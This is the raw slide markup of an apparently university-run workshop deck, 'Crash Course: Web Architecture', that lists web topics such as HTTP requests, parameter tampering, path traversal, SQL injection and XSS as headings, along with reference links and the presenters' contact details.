              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Crash Course: Web Architecture</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Parameter Tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Path Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)</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Shape 722"/>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References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="723" name="Shape 723"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4526100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.barricade.io/cross-site-request-forgery-visually-explained/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://excess-xss.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://crypto.stanford.edu/cs155old/cs155-spring09/lectures/17-web-site-sec.ppt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-209550" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.slideshare.net/ColinEnglish/web-application-security-8584955</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-209550" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://securityintelligence.com/software-defenses-to-owasps-top-10-most-common-application-attacks/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-209550" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://www.firewall.cx/linux-knowledgebase-tutorials/introduction-to-linux.html/299-linux-file-folder-permissions.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200" u="sng">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="724" name="Shape 72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sz="3200"/>
              <a:t>HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Shape 158"/>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0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Shape 159"/>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160" name="Shape 160"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742339" y="2383025"/>
            <a:ext cx="5659330" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Shape 161"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1825500" y="2450454"/>
            <a:ext cx="756600" cy="3651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62" name="Shape 162"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2697150" y="2450450"/>
            <a:ext cx="2565600" cy="3651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63" name="Shape 163"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361400" y="2417575"/>
            <a:ext cx="1907700" cy="4143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64" name="Shape 164"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841950" y="2910950"/>
            <a:ext cx="4711200" cy="4770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2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61"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="200"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="161"/>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62"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="200"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="162"/>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63"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="200"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="163"/>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Shape 729"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500106" y="1687675"/>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buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="730" name="Shape 730"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6173787"/>
            <a:ext cx="2133600"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lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="731" name="Shape 731"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4022600"/>
            <a:ext cx="8229600" cy="1798800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Marina George – mxa120230@utdallas.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Nick Ramos – nor140030@utdallas.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Travis Wright – tnw130030@utdallas.edu</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Shape 737"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2130425"/>
            <a:ext cx="7772400" cy="1470000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="738" name="Shape 738"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="TexSAW2017.png" id="739" name="Shape 739"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="6585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HTTP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Shape 171"/>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172" name="Shape 172"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180500" y="1229100"/>
            <a:ext cx="6780450" cy="3087050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Shape 173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180500" y="1221700"/>
            <a:ext cx="1282800" cy="3651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74" name="Shape 174"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2463300" y="1221700"/>
            <a:ext cx="1137900" cy="3651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75" name="Shape 175"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180500" y="1586800"/>
            <a:ext cx="6780300" cy="9813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76" name="Shape 176"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1183201" y="2568098"/>
            <a:ext cx="6780300" cy="17481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pic>
        <p:nvPicPr>
          <p:cNvPr descr="html.png" id="177" name="Shape 177"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="-3710" l="0" r="0" t="3709"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1208325" y="4471950"/>
            <a:ext cx="6724650" cy="198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2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73"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="200"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="173"/>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74"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="200"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="174"/>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2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175"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="200"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="175"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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2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ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Static Web Page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Shape 184"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6173787"/>
            <a:ext cx="2133600" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" wrap="square"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descr="Screenshot (20).png" id="185" name="Shape 185"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2326850" y="1233938"/>
            <a:ext cx="4490289" cy="5135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